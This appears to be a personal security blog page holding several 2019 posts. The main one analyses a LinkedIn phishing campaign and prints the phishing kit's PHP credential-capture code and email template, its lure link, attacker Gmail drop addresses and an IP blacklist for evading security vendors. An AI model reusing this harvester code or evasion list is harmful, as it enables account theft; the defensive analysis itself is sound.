וַיִּשְׁלַח יָדוֹ הַמַּלְאָךְ יְרוּשָׁלִַם, לְשַׁחֲתָהּ, וַיִּנָּחֶם יְהוָה אֶל-הָרָעָה, וַיֹּאמֶר לַמַּלְאָךְ הַמַּשְׁחִית בָּעָם רַב עַתָּה הֶרֶף יָדֶךָ; וּמַלְאַךְ יְהוָה הָיָה, עִם-גֹּרֶן האורנה (הָאֲרַוְנָה) הַיְבֻסִי

It is ironic, that the same ideas that the scripture fought so hard to invalidate are still as popular today as they were 3500 years ago. The prevalence of psychic readers on every street corner, Satanism in movies, literature, and popular culture just show you that regardless of how clear the instructions are, there is always a way to misinterpret them.

Death and Hollywood
Image 13: Satanic and demonic motifs in mainstream entertainment

Berkeley Psychics
Image 14
: Distribution and density of Psychics, Tarots Card Readers, and Clairvoyant Mediums in Berkeley

All of this makes you wonder: what is it about these simple four self-explanatory statements that can possibly be confusing?

  1. “I will pass through the land of Egypt”, I and not an angel;
  2. ”And I will smite every first-born in the land of Egypt”, I and not a seraph;
  3. ”And I will carry out judgments against all the gods of Egypt”, I and not a messenger;
  4. ”I G-d”, and none other!

Happy Passover and Happy Easter. 

References

Special thanks to Dr. Alshech for his help with translating portions of the introduction to the Golden Haggadah.

He Smote the First Born of Egypt – Handel Israel In Egypt

Campin’ In Canaan’s Happy Land – Stanley Brothers Old Time Camp Meeting Album

I have left the land of bondage with its earthly treasures
I’ve journeyed to the place where there is love on every hand
I’ve exchanged the land of heartaches for the land of pleasure
I’m camping, I’m camping, in Canaan’s happy land

Every day I’m camping (camping) in the land of Canaan (Canaan)
And in rapture I survey its wondrous beauty grand (Oh, Glory)
Glory, hallelujah (I have) found the land of promise
(And I’m) camping, I’m camping, in Canaan’s happy land

Out of Egypt I have traveled through the darkness dreary
Far over hills and valleys and across the desert sands
Thoughts of land that’s safe and homeward I shall not go weary
I’m camping, I’m camping, in Canaan’s happy land

Yes I’ve reached the land of promise with the saints of glory
My journey ended in a place so lovely and so grand
I’ve been led by Jesus to this blessed land of story
I’m camping, I’m camping, in Canaan’s happy land

The Promised Land – Hymn 128 Sacred Harp Tunebook
128 The Promised Land

On Jordan’s stormy banks I stand,
And cast a wishful eye,
To Canaan’s fair and happy land,
Where my possessions lie.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

Oh, the transporting, rapt’rous scene,
That rises to my sight,
Sweet fields arrayed in living green,
And rivers of delight.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

Filled with delight, my raptured soul
Would here no longer stay!
Though Jordan’s waves around me roll,
Fearless I’d launch away.

I am bound for the promised land,
I am bound for the promised land,
Oh, who will come and go with me,
I am bound for the promised land.

The Curse of Belial – Dead Scroll 394, 4Q2864Q287, fragment 6
Curse of Belial

(1) The Community Council shall say together in unison, ‘Amen. Amen.’ Then [they] shall curse Belial (2) and all his guilty lot, and they shall answer and say, ‘Cursed be [Be]lial in his devilish (Mastematic) scheme, (3) and damned be he in his guilty rule. Cursed be all the spir[its of] his Mot in their Evil scheme. (4) And may they be damned in the schemes of their [un]clean pollution. Surely [they are the to]t of Darkness. Their punishment (5) will be the eternal Pit. Amen. Amen. And cursed be the Evi[1] One [in all] of his dominions, and damned be (6) all the sons of Bel[ial] in all their times of service until their consummation [forever. Amen. Amen.’] (7) And [they are to repeat and say, ‘Cursed be you, Angel of the Pit and Spir[it of Destruction in al[1] the schemes of [your] gu[ilty] inclination, (8) [and in all the abominable [purposes] and counsel of [your] Wick[edness. And damned be you in [your] [sinful] d[omi]n[ion] (9) [and in your wicked and guilty rule,] together with all the abom[inations of She]ol and [the reproach of the P]it, (10) [and with the humiliations of destruction, with [no remnant and no forgiveness, in the fury of [God’s] wrath [for]ever [and ever.] Amen. A[men.] (11) [And cursed be al]1 who perform their [Evil schemes,] who establish your Evil purposes [in their hearts against] (12) Go[d’s Covenant,] so as to [reject the words of those who see] his [Tru]th, and exchange the Judge[ments of the Torah…]

Targum of Yonatan ben Uzziel (in Aramaic)
Targum (translation) Jonathan is a western targum of the Torah (Pentateuch) from the land of Israel as opposed to the eastern Babylonian Targum Onkelos (which was written by the nephew of the Roman emperor Titus). Its correct title was originally Targum Yerushalmi (Jerusalem Targum), which is how it was known in medieval times. But because of a printer’s mistake it was later labeled Targum Jonathan, in reference to Jonathan ben Uzziel. Some editions of the Pentateuch continue to call it Targum Jonathan to this day.

Most scholars refer to the text as Targum Pseudo-Jonathan. This targum also includes Aggadic material (non legal or narrative material, as parables, maxims, or anecdotes) collected from various sources as late as the Midrash Rabbah and the Talmud. It is a combination of a commentary and a translation. In the translation portions, it often agrees with the Targum Onkelos. The date of its composition is disputed. It cannot have been completed before the 633 CE Arabic conquest as it refers to Mohammad’s wife Fatimah, but might have been initially composed in the 4th Century CE. However, some scholars date it in the 14th Century (which would make this document contemporary with the Golden Haggadah). 

The Goddess Anath:Canaanite Epics of the Patriarchal Age – Umberto Cassuto

The Observer’s Book of Monsters – Gavin Lines
The Observer's Book of Monsters

Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The LinkedIn Real-time Messaging Phish of 2019

The LinkedIn Gangsters

A few days ago I received an invite from an old fintech colleague over the LinkedIn messaging service, the message read:

“Hi, I have attached a document for our new business financial proposal for your review. Access the proposal through the extension below and get back to me at your earliest convenience.

https://onedrive.live.com/?authkey=%21AFbNEI4K8RcVpmE&cid=EBDC72C570C985A5&id=EBDC72C570C985A5%21180&parId=root&o=OneUp

Coming from a 1st degree connection made this look like a legitimate communication. But, I haven’t been in touch with my friend for a while or have discussed any business with him recently, so this seemed a bit odd.

I texted him back via LinkedIn to verify that he indeed sent it. To my surprise, he responded in real-time with a confirmation. When I asked him if it was intended for me, he again confirmed it via the messenger application (Image 1).

LinkedIn RT Message Phish
Image 1: LinkedIn texting session

By all phishing standards, this one takes the cake. The attacker was actually conducting his exploit in real-time using my colleague’s compromised LinkedIn account. This was alarming because (1) the relatively high degree of trust that exists between you and your 1st degree network opens the door to a wide range of trust based attacks and (2) the real-time text messaging helped validate that the person that I was talking to was indeed the sender.

I switched to a sandboxed machine, clicked on the link, and went down the rabbit hole…

LinkedIn Link to OneDrive PDF
Image 2: Link from texting session to a OneDrive hosted PDF with a secondary login required to “View Message Folder”

The link to the business proposal routed to a PDF file that was hosted on a publically accessible Microsoft OneDrive folder (Image 2).

The PDF medatada indicated that it was created recently and dynamically using an Office365 MS Word. The file name was based on my colleague’s LinkedIn profile and the subject of the proposal was also related to his line of work. The author name of the PDF document had the wishful name “Incoming Wire”.

LinkedIn Phish PDF Metadata
Image 3
: The phishing PDF metadata

In order to “Continue reading your messages from OneDrive for Business”, I had to click on a second link titled “VIEW MESSAGE FOLDER”.  

The second link routed to the URL: ”https://normaav.ga/review”. This appeared to be a general access portal that aggregated different email systems and allowed the user to select their email provider of choice in order to view the “business proposal”.

LinkedIn Phish Login Portal
Image 4
: The logion portal loaded after clicking the PDF link

Clicking on the Office365 button option loaded a sign-in page and prompted me to enter my email address and the password for my Office365 account.

Normaav GA Office 365 Login
Image 5
: The fake Office365 logion page

Clicking on the other buttons resulted in the same functionality but with different email client login screens (Image 6).

LinkedIn Phish Logins
Image 6
: Other email client login pages

The amount of details built into the site was impressive. Where most phishing login pages deactivate superfluous links and features for efficiency reasons, this site was fully functional and even included the ability to reset your password–which came with a functional glyph generator and voice word reader.

Password Reset
Image 7
: Sample password reset screen

Next, I checked the .GA domain for some clues. It came back as a Gabon based account, however, the details of the registrar had the following Netherlands address:

Domain name:NORMAAV.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

After a little more digging, I found that the same owner also registered several other phishing domains that included sites like:

Domain name:TECHGURUHELP.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:     +31 20 5315721

So, from the look of it, this phishing site was just an elaborate email address and password collection utility. It wasn’t used for malware distribution or payload delivery.

The structure Narmaav.ga was made-up of several directories each comprised of PHP, html, images, Zip file, and some JavaScript files. The zip file housed all of the executable and site code and also provided an additional layer of obfuscation from the anti malware scanners that would be running on the hosting server.

Normaav GA File
Image 8: Sample content of one of the Narmaav.ga website “file” directory

LinkedIn Phish Directory Content
Image 9: The content of the “assets” directory showing the images and icons used to create the fake login screens

As far as the mechanics of the user data collection, clicking the “Next” button on the email login screen executed the following post function:

if (isset($_POST[‘username’]) && isset($_POST[‘password’])) {
    if ($_POST[‘username’] !== “” && $_POST[‘password’] !== “”) {

        $date = date(‘l d F Y’);
        $time = date(‘H:i’);
        $user = $_POST[‘username’];
        $pass = $_POST[‘password’];
        $source = $_POST[‘from’];
        $ip = $_SERVER[‘REMOTE_ADDR’];
        $systemInfo = systemInfo($_SERVER[‘REMOTE_ADDR’]);
        $VictimInfo1 = “| Submitted by : ” . $_SERVER[‘REMOTE_ADDR’] . ” (” . gethostbyaddr($_SERVER[‘REMOTE_ADDR’]) . “)”;
        $VictimInfo2 = “| Location : ” . $systemInfo[‘city’] . “, ” . $systemInfo[‘region’] . “, ” . $systemInfo[‘country’] . “”;
        $VictimInfo3 = “| UserAgent : ” . $systemInfo[‘useragent’] . “”;
        $VictimInfo4 = “| Browser : ” . $systemInfo[‘browser’] . “”;
        $VictimInfo5 = “| Os : ” . $systemInfo[‘os’] . “”;
        $data = “
+ ————- Scampage ————–+
+ Account Details
| Username : $user
| Password : $pass
| Source: $source
+ ——————————————+
+ Victim Information
$VictimInfo1
$VictimInfo2
$VictimInfo3
$VictimInfo4
$VictimInfo5

| Received : $date @ $time
+ ——————————————+

Its evident from the comments that the developer didn’t even bother anonymizing the variables, they just matter-of-factly named them: “Victim Information”, “Victim1”, “Scampage”, etc. Apparently, in the scammer industry, ripping off people is just another dehumanized banal job, not much different than stuffing hot dogs into a box on a production line.

Phish Victims
Image 10: Phishing victims as hot dogs

The data upload logic was also rudimentary without any fancy command and control features. Once all of the user information was collated, the content was simply posted to a “boxoffice794@gmail.com” email address. This Gmail account turned out to be just one of over 8134 emails used for data collection. The phishing site itself also came in a number of variations, with different version utilizing one or more of the listed email addresses (see a few samples below).

Password Collection Email Addresses

adamandeve10000@gmail.com

emailresult1000cc@gmail.com

boxresult81@gmail.com

johnbeng95@gmail.com

tingyangting111@gmail.com

sharoncute48@gmail.com

mrtrqbing@gmail.com

chingy555@gmail.com

cleverin15@gmail.com

edu.logs1@gmail.com

Table 1: A sampling of 10 emails out of the 8134 used by the phishing sites.

From a linguistic/semantic point of view, the creator of the site and the email accounts is most likely a native American English speaker who pays close attention to details. The verbiage on site has no spelling or major grammar issues. The composite names used in the email accounts demonstrate cleaver wordplay and use of contemporary idioms. The word generation algorithm also takes into account human readable combinations such as:

sql-injection
alibaba-reloaded
blood-money
call-me-ghost
extremely-blessed-007

Another interesting observation about the code is that it utilizes defensive strategies and countermeasures. For example, it uses a blacklist of IP addresses to stop the data uploader from running on high risk networks (like Fortinet, Kaspersky, Avg Technologies, etc.) where this activity would most likely be quickly detected and stopped. So in essence, this is a signature based form of reverse malware protection.

# _blacklist.dat  — contains address ranges to always be blocked.
#   Only IPv4 addressing is supported.
#
#   legal range formats are:
#
#   255.255.255.255                             Single address
#   255.255.255.255/16                       CIDR Mask
#   255.255.255.255/255.255.0.0       address w/mask
#   255.255.*.*                                        wildcards
#   255.255.255.0-255.255.255.255   low to high address
#
#   Comments may be added to a line starting with ‘#’ character
#   and inline comments may be added starting with ‘#’ character.
#


#  TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

 

#  AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255

Table 2: Extract from the blacklist used by the application in order to avoid high risk networks

It’s noteworthy that several of the PHP functions (see sample below) contain a reference to “MADEMEN CYBER TEAM”. The code also contains references to a specific developer who is using the alias “Sage The Hurt Ice”, this name is also associated with an active PayPal account called “payp algent” and “paya_ldirect”. 

Paypa_ldirect
Image 11: The author “SAGE THE HURT ICE”

 <TABLE>
    <tr><td>________MADEMEN CYBER TEAM_________</td></tr>
    <tr><td><STRONG>$domain I.D: $login<td/></tr>
    <tr><td><STRONG>Password: $passwd</td></tr>
    <tr><td><STRONG>IP: $ip</td></tr>
    <tr><td><STRONG>Date: $server</td></tr>
    <tr><td><STRONG>country : $country</td></tr>
    <tr><td>Browser : $browserAgent</td></tr>
    <tr><td>____HACKED BY SAGE THE HURT ICE (SKYPE =PAYP ALGENT)____</td></tr>
    </BODY>

What makes this exploit so potent is that the operation is combining machine generated content, large degree of automation, and the creation of near real-time customized payloads that are based on LinkedIn account user data. Just like with a traditional mail merge operation where the customization of each letter is done by pulling content from different databases, the same takes place here, with a slight variation that the database is the user’s LinkedIn profile and the ‘mail to’ is his entire LinkedIn network.

With all of these dynamic orchestration capabilities, the cheery on the cake is that there was also a human in the loop that chatted with the target in real-time in order to confirm the authenticity of the phish.

This exploit should be a major concern for LinkedIn and its users. in 2016, LinkedIn lost 117 million user accounts (they were hacked as early as 2012 but didn’t discover it until 2016). Many of these passwords have not been changed by the users who are still unaware of the breach. This means that the perpetrators of the current phishing expedition are essentially shooting fish in a barrel.

Based on the Narmaav.ga site uptime of 4 days (before it was flagged as ‘deceptive” by the search engines), the volume of recovered passwords, and the number of concurrent phishing campaigns (about 10K), a conservative estimate for this campaign’s yield is over 100K new breached accounts.

So what can you do to avoid getting your LinkedIn account hacked? Obviously, don’t click on any links sent to you via the messenger. You should stop reusing the same password for multiple accounts and make it more complex. You should also consider using a password management system. In the long run though, your best bet is to enable two factor authentication (using your phone) for all of your accounts. Most ecommerce sites like Amazon, PayPal, and email providers already offer this as a free service and activating it is just a simple two step process.

Notes
Soon after detecting the exploit, I notified LinkedIn about the details of the breach. It took LinkedIn more than 48 hours to reply. The response I got was “We have provided this information to the correct team to review further and act based on their results.”  I haven’t heard back from them since. I have also followed up with several of the victims, who were completely unaware that someone took over their LinkedIn account and was using it to mount a phishing expedition.

If you haven’t done this for a while, It may also behoove you to login to your LinkedIn and other social media accounts just to make sure that it’s still accessible.

References
2019 State of the Phish Report (page 11-19 cover estimated recovery rates) – Proofpoint.com
The complete phishing kit  (source code and files)
The phishing email addresses directory (where the stolen credentials are sent after harvesting)
LinkedIn Breach Exposed 117 Million User Accounts – eSecurity Planet
Facebook stored 200-600 millions of Instagram passwords in plain text – IT ProPortal
Password Safe – A free and open source password management system

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The Great Password Storage Survey

Find Milton's Password

The idea for the password survey came about more than fifteen years ago when I managed a security team in a large fortune 500 organization. While designing a new fraud detection platform, we discovered that a significant number of previous security incidents were attributed to compromised user passwords and credentials. The data suggested that this problem effected all business divisions and departments across the company and our partners. After a successful campaign to launch a corporate-wide root cause initiative, we ran a pilot that examined the password storage and retrieval practices in one of our regional offices with about 900 employees. After concluding the initial survey, we expanded the sampling to three other corporate locations.

The results of the first survey were supplemented by data I collected a few years later while working for a managed security service company that provided hosted proxy, firewall, IDS, and anti-malware service to several hundred credit unions and community banks. The focus of the second survey was on small to medium size U.S. based financial institutions.[1]

The total population examined in the study was about 3700 accounts and individuals. The corporate units included development, IT administration, business groups, and general staff. The sampled data reflects a typical cross-section of large (20K-40K) and small to medium (20-750) sized organizations and represents a historical snapshot of password practices in a typical regulated financial service company circa 2003-2010.

4-Password found by unit

Chart 1: Password found by business unit

Background
Knowledge-based authentication that utilizes passwords is different from other access control methods because it promotes the idea that by increasing the password entropy we can resist and discourage a brute force password recovery attack.

For many security practitioners this seems like a panacea. Policies calling for additional password complexity appear attractive at first but their practical enforcement on a multi-platform and enterprise scale are difficult to implement.

This is especially the case when we prohibit users from writing their passwords down or reusing them. The user’s inability to manage numerous complex and frequently expiring passwords can eventually compromise even the most secure environments that support multi-tiered firewalls and utilize the most advanced IDS, and robust VPN connectivity.

Paradoxically, it seems that when it comes to passwords, the user is caught between a rock and a hard place; the more secure the password is, the less so is the user.

Heterogynous Environments and a Glut of Passwords
The never ending cycle of M&A continues to create heterogynous platforms within the enterprise. This phenomenon results in the proliferation of systems with different rules for password lifecycles, login procedures, and authentication standards. The impact on the users has been overwhelming as they need to deal with an ever increasing number of login challenges.

Even in well consolidated enterprise that utilize state of the art Active Directory and Single Sign-On, there are a handful of work issued standalone devices and online accounts that are not tied to the central login infrastructure. Even in these integrated environments, the expiration of individual passwords is rarely synchronized, often causing a cascade of resets on other systems with user lookouts and loss of productivity.

To further complicate this, all employee also maintain dozens of non work-related passwords that they use during their work day. This significantly increases their cognitive burden, so in an effort to conserve energy, some resort to consolidating their private and work passwords into a single file. The survey suggests that if we tally the work and private accounts, the average number of user passwords each person has can exceed 60 (Chart 2).

The number of work related accounts varied with the user’s corporate responsibility (Chart 3), but on average, each had between 10-20 passwords.

1-Average number of passwords per user
Chart
2
: Average number of passwords per user

Information Overload
The human factor plays a significant role in the challenge of creating, storing, and retrieving complex passwords. A number of psychological experiments have demonstrated that subjects are able to repeat accurately around eight meaningful combinations of letters, numbers, and words.[2]

When a user is given several random passwords that are eight characters long, most will remember only one. If a user is required to remember two or more such passwords, he or she will likely resort to writing them down.

When asked how many IDs and passwords did they have to keep track of, the user’s immediate answer was “way too many!” The majority of users have also stated that it was bad enough when they only needed a handful of passwords to access e-mail, the network and mainframe accounts. But now, every internal and external application required a complex password.

2-Average number of passwords per user type
Chart 3:
Average number of passwords per user type        

3-Reason for writing passwords down

Chart 4: Reasons for writing passwords down

So how did the users resolve the problem of maintaining dozens of strong passwords? When pressed, most admitted—as the research suggested—that they resorted to keeping a written list or that they have been using the same password or a variant of it for multiple systems. 

On the record, administrative staff denied that they followed this practice but off the record they admitted that they were powerless to stop it and that they themselves were guilty of these same offenses. Other industry sources suggest that this is indeed a widespread phenomenon.[3]

When questioned about their memorization techniques (the policy requires that passwords be memorized), many of them indicated that utilizing mnemonics, backronym, and other techniques were tiresome and this resulted in forgetfulness, mistakes, and system lockouts. 

The majority of users (75%) stated that they could not memorize complex passwords and when they attempted to achieve this in the past it always resulted in password resets. It is interesting to note that as much as 10% of the users felt that the high frequency of the password expiration did not warrant the investment in memorizing it. Another 10% of the users felt that actually writing the password down made them more productive.

5-Password issued vs. password memorized
Chart 5: Password issued vs. password memorized

Password Storage Strategies
The password searches identified the existence of two types of password storage strategies. The first group (1) which consisted of 27% of the recovered passwords was made-up of data that was either handwritten or printed and stored in the user’s immediate work area. 

The written documents included artifacts such as post-it notes, legal pads, notebooks, and text on dry erase board. The second category (2) consisted of 73% of the recovered passwords found on electronic storage in the form of digital files on portable storage devices, PDAs, phones, hard drives, and network shares.

7-Password hiding locations
Chart 6: Password storage areas

The large percentage of electronically stored password suggests that users are somewhat security conscious and they do look for the middle ground between the two evils of keeping passwords out in the open and memorizing them.

The high rate of spreadsheet utilization (35%) for password storage suggests that without a proper company sponsored tool for managing passwords like a password safe, users will instinctively gravitate toward the next ‘best’ technology available in-house.

Password Hangouts
The majority (5% each) of users hid passwords either under a mouse pad or on sticky notes that were kept in a book or folder somewhere in the user’s immediate work area. The total percentage of passwords hidden ‘under’ various items (Table 1) was 27%.

Password Locations Office Work Area

# Found

% of Total

Under mouse pad, stapler, or tape dispenser

174

5%

Under keyboard

86

2%

Under desk calendar

77

2%

Under flower pot

32

1%

Under garbage can

11

0.3%

Under printer

29

1%

Under phone or phone reference card

51

1%

Under carpet or mat

7

0.2%

Under bookshelf

38

1%

Under paper tray

30

1%

Under or on whiteboard or clipboard

61

2%

Under trivet, coaster, paper weight, or pencil holder

18

0.5%

Interior door of coat cabinet

18

0.5%

Sticky note on the monitor

40

1%

Note inside a book or wallet

180

5%

Note in music CD box

67

2%

On whiteboard obfuscated using letter or number padding

72

2%

Total

1058

        27%

Table 1: Hidden password locations – Office work area

 

Password Locations on Electronic Storage

# Found

  % of Total

On floppy disk inserted in drive

15

0.4%

On USB, flash drive, or other device

80

2%

Protected spreadsheet on a password protected network share

613

17%

MS Access database on a network share

216

6%

Spreadsheet on a network share

620

17%

Text file located on a network share

281

8%

e-mail file (user would create and e-mail himself the new password)

408

11%

MS Word document

103

3%

File stored on an Intranet web site

300

8%

File stored on an Internet web site

26

1%

Total

2662

73%

Table 2: Hidden password locations – Electronic storage

 

The majority (73%) of the hidden passwords were kept on electronic storage (spreadsheets, documents, and e-mails) on a variety of locations, the most common being (1) 34% on network drive, and (2) 11% on the e-mail server (Table 2).  

Only 1% of the users openly placed the latest password on their monitor (Figure 1). It is interesting to note the password generation algorithm used. The first password on the list (which was complex) was used as the seed for all future passwords permutations. Each time the system required a new password; the user wrote the new one down and erased the previous one.

Whenever the system permitted the re-use of old passwords, we found a high degree of password recycling via password variances and sequential use. This included 62% of developers, 86% of administrators, 97% of business users, and 94% of admin and facility staff.  

8-User Passwords Written on a Sticky Pad 

Figure 1: User passwords written on a sticky note

 

Is there a Method in the madness?
75% of the user interviewed cited poor memory as the main reason (1) for writing and hiding passwords. The second (2) reason cited was the unspoken legitimacy of this practice and its widespread use. The third (3) reason was that the password was shared by several users and so having it written in a central location was the most convenient way to synchronize it and keep all users informed of any changes. This was primarily the case amongst DBAs, system administrators, and developers (87% combined). The majority of interviewees also acknowledged that they were aware of existing security policy that clearly discouraged such practices.

From conversations with administrative staff, ignorance of the law was not a factor in writing down passwords (Chart 8). Over 90% of the admins acknowledged that they knew that writing their system password down was against policy and information security directives, but they did it because they were located in a physically “secure area” that had strict access controls roles and that it was a calculated risk.

9-Percent of administrator told not to write down passwords
Chart 7: Percent of administrator told not to write down passwords

An interesting usage relationship shows that systems which periodically require users to change passwords actually trigger more people to ‘hide’ them in written form near their workstations. We estimated that the likelihood of finding written passwords near a workstation subjected to frequent password changes was 35% to 55%. At the same sites, the likelihood was only 10% to 20% for workstations connected to systems that did not enforce frequent password changes.

In many cases, over a third of the users created sequential passwords (Chart 8) such as changing Pa$$w0rd_1 to Pa$$w0rd_2. The stats for administrative users show that this practice was higher than 80% when permitted by the system. This information again is confirmed by other studies that show the user’s tendency to avoid constantly memorizing new, complex passwords and writing them down.[4]

 10-Used sequential passwords

Chart 8: Used sequential passwords

Social Factors that Contribute to Password Mismanagement
Password security relies on the premise that passwords are kept secret at all times. This is not a trivial requirement because in a typical password life cycle, there are many opportunities for compromise whenever a password is created, used, transmitted, or stored. Passwords are always vulnerable to compromise because:

  1. They need to be initially created and assigned to a user
  2. They need to be transmitted
  3. They need to be changed
  4. They need to be stored and retrieved

In this context, sharing passwords among a group of users would completely negate the need to keep it secret. When we asked the users about the practice of sharing passwords, the unanimous response was that this was a common practice exercised by all. In fact, the system and database administration and InfoSec teams which should have led the charge in fighting this phenomenon, were the largest practitioner of group password sharing (Charts 9-10).

11-Password sharing among administrators
Chart 9: Password sharing among administrators

12-Password sharing among developers
Chart 10
: Password sharing among developers

This contradictory situation raised several questions. When we asked the users about the clearly prohibited practice of password sharing they provided the following rationale:

  1. Friendliness––Users try to avoid behavior that would put them in a negative social light. Individuals who strictly protect their passwords by steadfastly refusing to write them down or share them with colleagues can be seen as anti-social.
  2. Conformity––Due to strong emphasis placed on “being a team player” and the importance of collaboration, many individuals determine that conformity is important and work hard to be sure that others see them as easygoing and trustworthy. For example, if a system administrator (an authority figure) asks a user for his log-in password, he is likely to reveal it because he doesn’t wish to seem suspicious of an authority figure.
  3. Trust––Sharing passwords between team members can be seen as a sign of collegial affiliation. If a user refuses to share a password with a co-worker, especially where such practice is commonplace, it could be seen as a sign of distrust.
  4. Unwritten work procedures––A team of co-workers will develop ‘informal’ procedures and workarounds to deal with occasional situations that impact their productivity (sharing workstations, using each other’s e-mail program, etc). Some of these workarounds may contradict official policies. Users who follow such informal procedures are normally acting in good faith; they are trying to be helpful and practical in an effort to get the job done.
  5. Responsibility––Users are aware of password policies, but continue to violate them nevertheless because they do not expect to be held accountable for breaking the rules, because “everyone” regards the regulations as unrealistic.
  6. Management Privileges––Senior employees believe that they are too busy to be expected to follow what they perceive as petty rules (which often IT and InfoSec are known to disregard).
  7. Relevancy––Some users believe they and their systems are not important enough to merit serious attention from an attacker. Some users also believe that rigorous passwords are neither truly realistic nor necessary and they do not see following information security policies as being relevant to their job requirements and/or professional reputation.

Security, Perception vs. Reality
Another interesting self-contradiction that affected user perception of password security was password reuse. When questioned about the practice of resetting passwords to previous ones, a large number of administrative users and developers stated that whenever the system permitted they did reset the new password to an older familiar one. In some cases administrator deliberately disabled password expiration policies in order to avoid the hustle. Clearly, this practice completely defeats any advantages associated with frequent password changes. 

12-Changed passwords back to original password left administrators, right developers
Chart 11: Changed passwords back to original password

When we asked the users for their rationale for ignoring security policy directives and making this and other judgment calls, the answer clustered around these topics:

  1. Lack of account privacy affected general work habits and security––When a user was regularly forced to write down his password because they lacked a tool to manage them properly, they also tended to justify keeping other sensitive information out in the open.
  2. Security mandates elicited strong emotional reactions––Users often spoke in emotional terms about unrealistic decrees, using terms like: “smoke and mirrors”, “lip service”, and “window dressing”. Further more, they said that they wanted their information to be secure and private but at the same time they had a fatalistic attitude towards security. That is, they felt resigned to accepting security breaches and privacy compromises.
  3. Inability to differentiation between security and privacy—Users didn’t distinguish between these two concepts and mostly focused on the outcome of a security breach and its impact on their work product. In one example, an administrator did not consider the common practice of shared usage of passwords by a fellow administrator to be a privacy or a security issue, when their password was discovered during the survey, they simply mitigated the damage by resetting the password and continuing the sharing practice.
  4. Multi-user applications and social interactions influenced information sharing—Collaborative work assignments and certain business process promoted password sharing. When it comes to account and password privacy, users working in a collaborative environment tended to have a more liberal and collective sense of account ownership.
  5. Few differences existed between home and business account management practices––User’s lack of concern for account privacy did not depend on their work location. They were consistent in their practices whether at home or at work. Remote users who connected via VPN were less concerned about the security of their work files because they considered the likelihood of someone hacking them at home to be minimal despite the fact that their off-site network was much less secure (many had no firewalls or up to date anti-malware protection). Also, most users working from home did not consider themselves to be the a potential target of an attack.

Conclusion
The survey results suggest that the widespread practice of users writing down passwords and keeping them in unsecured locations is a natural response to unrealistic security mandates. Users in general are concerned with productivity and view passwords management as an overhead and a dreaded chore. 

Practical password security depends on the availability of password management and enforcement mechanisms. Any password policy must on one hand balance the benefits of protection and enforcement and on the other minimize user impact. Without maintaining this careful balance, we run the risk of users coming to view policy mandates such as expiring passwords as tyrannical decrees that should be cleverly circumvented.

If a good personal and corporate security strategy depends on strong passwords—and few will argue that it does not—then the keystone of good password security is the establishment of an enterprise wide solution that will either completely eliminate passwords or facilitate the management of the entire password’s life cycle via an on-line, mobile, and off-line access.

Or as Milton Waddams would say, “Well, Ok. But… that’s the last straw. And, and I’m telling you It’s not okay because if they lock me out again and force me to memorize another complex password, I’m I’ll, I’ll, set the building on fire…”

 

Notes and References
Authentication in Internet Banking: A Lesson in Risk Management – FDIC (2007)
Uncovering Password Habits – Are Users’ Password Security Habits Improving?
The death of passwords is premature – Keeper (2016)
Microsoft admits expiring-password rules are useless – CNet (2019)

[1] Due to the sensitive nature of password surveys, conducting password storage searches should be planned and executed carefully and discreetly. Before conducting any searches, you should secure written approval from your IT, InfoSec, HR, and legal team. You should also coordinate all such activities with the local facilities team. Another good rule of thumb is to conduct all surveys in a team composed of representatives from HR and building security, this will eliminate the perception that some unknown individual is just pillaging and violating the privacy of employees after hours. Follow-up conversations with users regarding their password storage and recovery habits should be done in a private setting in a non-threatening or confrontational manner. You should make it clear to the interviewee that their cooperation is appreciated, that this will not reflect poorly on their evaluation, and the ultimate goal of this exercise helps improve the both personal and corporate data security and privacy. A $20 gift certificate to Starbucks or another popular outlet would go a long way towards easing the tensions.

[2] C. Coombs, R. Dawes, and A. Tversky, Mathematical Psychology: an Elementary Introduction. Prentice-Hall Press, (1970). And  The study by Yan, Blackwell, Anderson, and Grant “The Memorability and Security of Passwords-Some Empirical Results” (research paper, Cambridge University Computer Laboratory, 2001).  And Miller, George A. (1956). The magical number seven, plus or minus two: Some limits on our capacity for processing information. Psychological Review, 63, 81-97.

[3] Schneier on Security Write Down Your Password (2005)
Write Down Your Password

[4] Spafford, Eugene H. (1992). “Observations on reusable password choicesProceedings of the 3rd Security Symposium. Usenix, September.

 

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

Two and Two Makes Five

It’s the 70th anniversary of Orwell’s 1984.

“There will be no curiosity, no enjoyment of the process of life. All competing pleasures will be destroyed. But always— do not forget this, Winston— always there will be the intoxication of power, constantly increasing and constantly growing subtler. Always, at every moment, there will be the thrill of victory, the sensation of trampling on an enemy who is helpless.
If you want a picture of the future, imagine a boot stamping on a human face— forever. ”
― George Orwell, 1984 – Part 3, Chapter 4

Field Guide to the Progressive Movement Medals

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.